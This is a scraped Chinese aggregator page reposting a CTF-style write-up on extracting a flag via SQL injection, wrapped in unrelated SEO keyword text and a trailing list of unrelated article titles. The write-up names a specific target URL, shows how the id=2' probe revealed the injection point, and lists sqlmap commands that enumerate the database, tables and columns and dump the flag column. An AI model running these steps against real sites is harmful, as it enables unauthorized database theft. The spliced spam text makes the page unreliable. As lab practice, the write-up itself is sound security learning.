当前位置: 首页 > news >正文

网站 ip pv商城网站建设运营方案

网站 ip pv,商城网站建设运营方案,深圳网站制作首选灵点网络,为何打不开中国建设银行网站使用sqlmap burpsuite sql工具注入拿flag 记录一下自己重新开始学习web安全之路③。 目标网站#xff1a;http://mashang.eicp.vip:1651/7WOY59OBj74nTwKzs3aftsh1MDELK2cG/ 首先判断网站是否存在SQL注入漏洞 1.找交互点 发现只有url这一个交互点#xff0c;搜索框和登录…使用sqlmap burpsuite sql工具注入拿flag 记录一下自己重新开始学习web安全之路③。 目标网站http://mashang.eicp.vip:1651/7WOY59OBj74nTwKzs3aftsh1MDELK2cG/ 首先判断网站是否存在SQL注入漏洞 1.找交互点 发现只有url这一个交互点搜索框和登录框都没有。 2.找注入点 在唯一的交互点url中输入id2‘ 发现回显不正常说明该url是一个注入点 打开burpsuite 的抓包功能在url中输入id2’开始抓包。 使用sqlmap工具。 1.查看数据库名称message python sqlmap.py -r “C:\Users\86131\Desktop\555.txt” --current-db –current-db //列出当前所有数据库名称 db // datebase 2.查看数据表名称flag python sqlmap.py -r “C:\Users\86131\Desktop\555.txt” -D message --tables -D //指定数据库名称 –tables // 列出所有的数据表 3.查看数据列名称flag python sqlmap.py -r “C:\Users\86131\Desktop\555.txt” -D message -T flag --columns -D //指定数据库名称 -T // 指定数据表名称 –columns // 列出所有的列 4.查看数据 python sqlmap.py -r “C:\Users\86131\Desktop\555.txt” -D message -T flag -C flag --dump -D //指定数据库名称 -T // 指定数据表名称 -C // 指定数据列名称 –dump // 读取数据 MD5解密 遇到的问题 抓到的包必须是注入点的包不然用sqlmap的时候会报错。
http://www.w-s-a.com/news/645250/

相关文章:

  • 企业网站维护兼职丹阳网站优化
  • 秦皇岛网站开发公司怎么注册自己的公司
  • 写作网站哪个能得稿费绿色环保企业网站模板
  • 牡丹江网站建设定制开发安徽建设工程信息网官网入口
  • 有什么好的网站建设的书适合在家做的网站工作
  • wordpress情侣源码西安网站快速优化
  • 昆明网站建设高端定制100种班服设计图
  • 网站开发程序说明html网页制作接单
  • 企业网站货物查询怎么做制作文件的软件
  • 怎么做网站的防盗链北京门户企业网站建设
  • 网站推广的主流方法淘客网站 源码
  • 网站海外推广怎么做多用户商城系统源码教程
  • 猎头做单网站网站创建费用
  • 住房和城乡建设网站 上海自己做网站还是公众号
  • 投票网站怎么制作电商网站模板html
  • 攀枝花移动网站建设抖音广告投放平台
  • 什么是网站设计第一装修网
  • 公司网站建设一条织梦门户网站源码
  • 网站改版中su域名注册
  • 做网站有没有前途济南产品网站建设外包
  • 网站备案咨询做静态网站多少钱
  • 软件开发和网站建设一样吗太原今天最新通知
  • 网站推广如何做的表白制作网站
  • 网站风格分析免费织梦网站源码
  • 大连手机自适应网站建设织梦做音乐网站
  • 烟台网站建设优化网页设计师证
  • 手机微网站建设多少钱个人网站 wordpress
  • 做外贸是不是必须有网站wordpress网络图片
  • 赣县企业网站建设用dw做网站的基本步骤
  • 辽源网站建设微信小程序公众平台